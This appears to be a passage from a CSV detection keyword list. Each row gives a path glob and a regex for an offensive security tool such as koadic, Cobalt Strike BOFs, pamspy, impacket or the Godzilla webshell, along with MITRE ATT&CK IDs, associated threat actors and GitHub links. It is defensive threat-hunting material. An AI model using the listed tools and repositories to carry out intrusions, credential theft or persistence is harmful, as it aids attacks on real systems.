"*/regread.lua*",".{0,1000}\/regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10328"
"*/regreeper.jpg*",".{0,1000}\/regreeper\.jpg.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","10329"
"*/Reg-Restore-Persistence-Mole*",".{0,1000}\/Reg\-Restore\-Persistence\-Mole.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","10330"
"*/regsvcs/meterpreter*",".{0,1000}\/regsvcs\/meterpreter.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","10331"
"*/regsvr.cmd*",".{0,1000}\/regsvr\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","10332"
"*/regsvr32/shellcode_inject*",".{0,1000}\/regsvr32\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","10333"
"*/regwrite.lua*",".{0,1000}\/regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10334"
"*/regwritedel.lua*",".{0,1000}\/regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10335"
"*/releases/download/*/abc.exe*",".{0,1000}\/releases\/download\/.{0,1000}\/abc\.exe.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","10338"
"*/releases/download/Binaries/DeadPotato*",".{0,1000}\/releases\/download\/Binaries\/DeadPotato.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","10340"
"*/releases/download/impacket_*",".{0,1000}\/releases\/download\/impacket_.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10341"
"*/releases/download/panix-v*/panix.sh*",".{0,1000}\/releases\/download\/panix\-v.{0,1000}\/panix\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","10342"
"*/releases/download/v*/pretender_*",".{0,1000}\/releases\/download\/v.{0,1000}\/pretender_.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","10343"
"*/releases/download/v0.1.0/dnspot-*",".{0,1000}\/releases\/download\/v0\.1\.0\/dnspot\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","10344"
"*/releases/download/v0.1/pamspy*",".{0,1000}\/releases\/download\/v0\.1\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","10345"
"*/releases/download/v0.2/pamspy*",".{0,1000}\/releases\/download\/v0\.2\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","10346"
"*/releases/download/v1.0/ADFSRelay*",".{0,1000}\/releases\/download\/v1\.0\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","10347"
"*/releases/download/v1.0/NTLMParse*",".{0,1000}\/releases\/download\/v1\.0\/NTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","10348"
"*/releases/download/v4.0.1-godzilla/godzilla.jar*",".{0,1000}\/releases\/download\/v4\.0\.1\-godzilla\/godzilla\.jar.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","10349"
"*/releases/latest/download/cloudflared-darwin-amd64.tgz*",".{0,1000}\/releases\/latest\/download\/cloudflared\-darwin\-amd64\.tgz.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","#linux","N/A","10","","N/A","","","","10350"
"*/releases/latest/download/lse.sh*",".{0,1000}\/releases\/latest\/download\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","10351"
"*/remot shell.pl*",".{0,1000}\/remot\sshell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10355"
"*/Remote/adcs_request/*",".{0,1000}\/Remote\/adcs_request\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10357"
"*/Remote/office_tokens/*",".{0,1000}\/Remote\/office_tokens\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10358"
"*/Remote/procdump/*",".{0,1000}\/Remote\/procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10359"
"*/Remote/ProcessDestroy/*",".{0,1000}\/Remote\/ProcessDestroy\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10360"
"*/Remote/ProcessListHandles/*",".{0,1000}\/Remote\/ProcessListHandles\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10361"
"*/Remote/schtaskscreate/*",".{0,1000}\/Remote\/schtaskscreate\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10362"
"*/Remote/schtasksrun/*",".{0,1000}\/Remote\/schtasksrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10363"
"*/Remote/setuserpass/",".{0,1000}\/Remote\/setuserpass\/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10364"
"*/Remote/setuserpass/*",".{0,1000}\/Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 